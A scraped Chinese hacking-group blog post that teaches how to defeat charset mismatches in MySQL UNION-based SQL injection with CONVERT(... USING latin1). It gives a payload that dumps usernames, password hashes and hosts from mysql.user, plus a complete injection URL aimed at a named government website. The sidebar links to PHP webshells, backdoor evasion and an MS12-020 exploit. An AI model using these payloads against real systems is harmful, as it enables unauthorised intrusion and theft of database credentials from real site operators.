再谈联合查询注入字段间编码不同无法显示内容问题

最新推荐文章于 2024-02-09 22:30:46 发布
最新推荐文章于 2024-02-09 22:30:46 发布
阅读量680 收藏
点赞数
分类专栏: sql注入
作者:小D
来自:Silic Group Hacker Army
转载请注明:http://blackbap.org
首先我们来看这样的一个文章:简单搞定联合查询注入字段间编码不同无法显示内容问题
http://bbs.blackbap.org/thread-1646-1-1.html

这种EUC日本语言的网站用hex无可非议,但是如果遇到utf-8编码和lang=en啊西欧啊什么的不兼容,这样hex来unhex去的,相当麻烦。其实在俄罗斯黑客那里还有个更简单的方法。当然,函数还是函数,函数都是MySQL的,要看你怎么用了。
函数名称:convert()
作用:转换编码格式
在MySQL的编码格式中,有这么几种:gb2312和utf-8(当然还有,国内基本没有用的),还有一个默认的Latin1
如果显示位能显示数字,却无法显示user()(判断编码不同这个问题我就不重复了。。。),就可能是编码不同。这个时候用convert转换成latin1显示就行了。用法例如: 
  1. CONVERT(group_concat(DISTINCT+user,0x3a,password,0x3a,host)+USING+latin1)
复制代码
就这么简单。至于例子,自己找吧。convert也不是个难记的函数。转载请注明:http://blackbap.org
补充一个最痛快的例子,就是Mr.Cool原文章中的:
  1. http://www.gov.ai/vacancies/details.php?id=-1+UNION+SELECT+1,2,3,4,5,6,CONVERT(group_concat(DISTINCT+user,0x3a,password,0x3a,host)+USING+latin1)+from+mysql.user/*
复制代码
注入HEXMySQL
kuxing100
关注
专栏目录
mysql 多表联合查询 游标_MySQL多表查询,Navicat使用,pymysql模块,sql注入问题
weixin_31190099的博客
01-19 643
一、多表查询#建表create table dep(id int,name varchar(20));create table emp(id int primary key auto_increment,name varchar(20),sex enum('male','female') not null default 'male',age int,dep_id int);#插入数据insert...
MSSQL之联合注入
聚鼎安全
12-24 2173
本章目录:联合查询注入语句利用回显点权限判断查库:查表:查列名:查列内容:联合注入例: 联合查询注入语句 第一步 判断注入 and 1=1 and 1=2 第二步 猜解列数(字段长度) order by 1 返回正确 order by 2 返回正确 order by 3 出现错误 ?id=-2union all select null,null,null,null-- //在第四个的时候页面显示正常,说明字段为4 ?id=2and 1=(select is_srvrolemember(‘sysadm
[实例] 简单搞定联合查询注入字段编码不同无法显示内容问题
kuxing100的专栏
04-19 1011
作者:YoCo Smart 来自:习科信息技术 Silic Group http://blackbap.org 注入的时候往往能碰到这样一种情况:有显示位,但是无法显示内容,甚至连database()都无法显示。今天找到一个绝好的例子来讲这样的一种情况。 注入点:http://www.tkfd.or.jp/research/theme/index.php?id=1 导致这种情况出现的原因
silic group第五版php木马,::Silic Group Hacker Army PHP webshell - blackbap.org::
weixin_39724889的博客
03-12 388
$prompt view file/foldernamesizeowner:grouppermsmodifiedactions "; if($tree > 2) for($i=0;$i : ".$group['name']; } else { $owner = $user; } $buff .= "LINK".$owner."".get_perms($pwd)."".date("d-M-Y...
手机连接php大马,习科大马 v5.6
weixin_34151005的博客
03-10 647
Silic Webshell V5.6 使用手册Silic Group Hacker Army后门管理程序欢迎使用Silic Group Hacker Army开发的Web安全测试程序本程序基于php开发和运行,代码行数2210 lines, 程序大小135KB(占用空136KB),本程序未加密,无后门。请将本脚本置于支持php的目录并访问运行,默认密码为Silic,首字母大写。目录1)主界面-...
silic group第五版php木马,php一句话后门特征码与免杀-zz
weixin_32192627的博客
03-12 485
作者:YoCo Smart来自:Silic Group Hacker Army [BlackBap.Org]首先我们要明白什么是一句话木马。“一句话”是一种特征性很强的脚本后门的统称和简称,其特征就是代码很短,短到甚至只有一句话,但是却能用这句很短的代码,完成无数的复杂功能。我们来对下面这样的一个一句话进行简单剖析:复制代码这是php的一句话后门中最普遍的一种。它的工作原理是这样的:首先存在一个变...
Chinese Shit Silic Group修正版 MS12-02 Exp
04-25
#!/usr/bin/env python # ms12-020 "chinese shit" PoC v2 (wireshark版) # 测试平台:win sp3(西班牙语), 据反馈Win7和win 2008也同样可用 # Silic Group - 技术自由 技术创新 技术共享 技术原创 技术进步 # BlackBap.Org # Win7_x64_sp1/Win_xp_sp3 bug修正 添加time.sleep # Silic Group Hacker Army exp好了 在cmd里 cssg.exe ip 即可
sql注入联合查询,最详细的CMS联合查询过程!!!!
08-22
【步骤2:回显位判断】为了显示联合查询的后半部分结果,需要使前半部分查询返回假值,因此添加了`and 1=2`或`id=-35`这样的条件,使得主查询无法匹配任何记录,从而展示联合查询的部分。 【步骤3:查询数据库信息...
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 012-网络安全应急技术与实践(Web层-SQL注入
最新发布
时光隧道
02-09 7万+
Web层攻击分析与应急响应演练是指对Web应用程序进行攻击分析,发现潜在的漏洞和安全威胁,并在发生安全事件时能够迅速做出应急响应措施的过程。进行Web层攻击分析是为了了解Web应用程序存在的弱点和漏洞,从而提前对其进行修复和加固。攻击分析可以包括对Web应用程序进行安全扫描、漏洞评估和渗透测试等活动,通过模拟真实攻击场景,发现可能被黑客利用的漏洞,如SQL注入、跨站点脚本攻击(XSS)、跨站点请求伪造(CSRF)等。攻击分析的目的是为了及早发现和修复潜在的安全问题,确保Web应用程序的安全性。
union联合注入
m0_60945802的博客
03-21 4904
union联合注入
Hacker——渗透技术
07-02
第1章 基础知识 第2章 缓冲区溢出利用技术 第3章 shellcode技术 ……
一对多查询关联表中各个编号最新的数据
weixin_43859696的博客
04-15 527
一对多查询关联表中各个编号最新的数据 SELECT a.*,b.* FROM band_dtls a LEFT JOIN ( SELECT gbd.* FROM 关联表名 gbd LEFT JOIN ( SELECT *, MAX( start_datetime ) start_datetime FROM 关联表名 GROUP BY id) goad ON gbd.i...
[Silic]国外注入
weixin_30858241的博客
10-27 120
视频地址: http://pan.baidu.com/s/1ntE68Tb 代码: concat(0x3c7363726970743e6e616d653d70726f6d70742822506c6561736520456e74657220596f7572204e616d65203a2022293b2075726c3d70726f6d70742822506c6561736520456...
解决mysql连表查询别名不起作用,同名的字段只能显示其中一个字段值。
fubo1990的博客
03-17 6223
最近在项目开发中的持久层(JDBC)遇到了一个这样的问题,就是mysql如果连表查询,如果两表中的字段都不相同,那么可以正常查询两表中的任意字段的值。但是如果两表中有相同字段,且想把两个字段值都取出来,并且取了别名。在navicat 中别名起作用。但是放到项目中,就达不到预期效果,结果只显示一个字段的值。 eg: 一个表 test1 含有字段 id,name,password  ,parent_
Silic PHP大马Cookie欺骗漏洞
weixin_34409357的博客
03-14 354
$password="ebd9a3c106064a255aaee28b6eb4f21c"; if($_COOKIE['admin_silicpass'] != md5($password)) //如果cookie 里面的admin_silicpass 不等于 md5($password) { ob_start(); $MSG_TOP = 'LOG...
SQL注入——联合查询和报错注入
18年3月萌新白帽子
06-11 6191
1.别人可能用一个括号将要查询的内容阔在一起了  可以使用)将其闭合2.还有人可能过滤掉了关键字可以使用如下方法anandd   selecselectt如果URL中把=号过滤掉了可以使用like进行模糊查询报错注入中sql里 0x3a表示一个冒号具体用法and (select 1 from (select count(*),concat((select count(schema_name) fr...
mysql数据库在查询的时候不能使用字段别名,字段别名只在显示的时候显示出来
digitalkee的博客
02-16 1036
例如:现在有department表,如下: mysql> select * from department; +------+-----------+--------------+-------------+ | d_id | d_name | function_ | address | +------+-----------+--------------+-------------+ | 1001 | 科研部 | 研发产品 | 3号楼5层 | | 1002
PHP注入漏洞分析:寻找管理表与字段策略
这个查询从`information_schema.tables`系统表中聚合并返回了不同的表名,其中`0x796A7A785F6462`是十六进制编码的“yjzx_db”。通过分析返回的表名,如`tpl_system`和`tpl_news`,攻击者推测这些可能是管理相关的表...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值